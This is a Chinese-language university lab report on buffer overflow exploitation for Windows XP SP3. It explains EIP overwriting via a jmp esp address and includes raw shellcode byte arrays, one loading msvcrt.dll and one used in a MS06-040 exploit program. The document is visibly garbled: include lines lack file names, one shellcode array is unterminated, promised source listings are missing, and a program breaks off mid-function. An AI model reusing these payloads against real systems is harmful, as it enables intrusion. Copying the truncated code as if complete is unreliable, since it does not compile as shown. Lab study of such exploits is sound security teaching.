实验四缓冲区溢出攻击技术

实验单元四. 缓冲区溢出攻击技术

一、实验目的和要求

1.掌握缓冲区溢出的原理；

2.掌握缓冲区溢出漏洞的利用技巧；

3.理解缓冲区溢出漏洞的防范措施。

二、实验内容和原理

缓冲区溢出的原理:通过往程序的缓冲区写超出其长度的内容，造成缓冲区的溢出，从而破坏程序的堆栈，使程序转而执行其它指令，以达到攻击的目的。造成缓冲区溢出的根本原因是程序中缺少错误检测。

当然，随便往缓冲区中填东西造成它溢出一般只会出现“分段错误”（Segmentation fault），而不能达到攻击的目的。最常见的手段是通过制造缓冲区溢出使程序运行一个用户shell，再通过shell 执行其它命令。如果该程序属于root，攻击者就获得了一个有root 权限的shell，可以对系统进行任意操作。缓冲区溢出攻击之所以成为一种常见安全攻击手段其原因在于缓冲区溢出漏洞太普遍了，并且易于实现。而且，缓冲区溢出成为远程攻击的主要手段其原因在于缓冲区溢出漏洞给予了攻击者他所想要的一切：植入并且执行攻击代码。被植入的攻击代码以一定的权限运行有缓冲区溢出漏洞的程序，从而得到被攻击主机的控制权。缓冲区溢出漏洞和攻击有很多种形式，而相应的防范手段也随者攻击方法的不同而不同。

三、实验项目

缓冲区溢出产生cmd窗口；

改写函数返回地址；

shellcode的编写；

shellcode的植入。

四、实验所需软硬件

1）仪器设备条件：PC及其网络环境；

2）物质条件：Windows XP SP3、Linux、Gcc、Visual C++ 6.0 编译器等，OllyDbg；

3）相关文献资料：课件及网上收集的资料。

五、操作方法与实验步骤

1.缓冲区溢出漏洞产生的的基本原理和攻击方法 缓冲区溢出模拟程序

程序源代码如下：

运行该程序产生访问异常：

由于拷贝字符串时产生缓冲区溢出，用“ABCD”字符串的值覆盖了原来EIP的值，所以main函数返回时EIP指向44434241，引发访问异常。

运行命令窗口的shellcode

shellcode测试代码如下：

#include "string.h"

#include "stdio.h"

#include

char name[]=

"\x41\x41\x41\x41"

"\x41\x41\x41\x41"

"\x41\x41\x41\x41" ///覆盖ebp

"\x12\x45\xfa\x7f" ////覆盖eip，jmp esp地址7ffa4512

"\x55\x8b\xec\x33\xc0\x50\x50\x50\xc6\x45\xf4\x6d"

"\xc6\x45\xf5\x73\xc6\x45\xf6\x76\xc6\x45\xf7\x63"

"\xc6\x45\xf8\x72\xc6\x45\xf9\x74\xc6\x45\xfa\x2e"

"\xc6\x45\xfb\x64\xc6\x45\xfc\x6c\xc6\x45\xfd\x6c"

"\x8d\x45\xf4\x50\xb8"

"\x77\x1d\x80\x7c" // LoadLibraryW的地址

shellcode测试代码运行效果如下：

由于把main函数的返回EIP地址替换成了jmp esp的地址，main函数返回的时候就会执行我们的shellcode代码。该shellcode，运行命令窗口。2.MS06-040 缓冲区溢出漏洞分析和利用

溢出点定位

溢出点定位源代码

#include

typedef void (*MYPROC)(LPTSTR);

int main()

{

char arg_1[0x320];

char arg_2[0x440];

int arg_3=0x440;

char arg_4[0x100];

long arg_5=44;

int i=0;

HINSTANCE LibHandle;

MYPROC Trigger;

程序运行效果如下：

可以看到错误访问地址为63636363，即为‘c’的编码，所以成功得定位了溢出点。

漏洞利用

漏洞利用的源代码如下：

#include

typedef void (*MYPROC)(LPTSTR);

char shellcode[]=

"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"

"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"

"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"

"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"

"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"

"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"

"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"

"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"

"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"

"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"

"\x53\xFF\x57\xFC\x53\xFF\x57\xF8";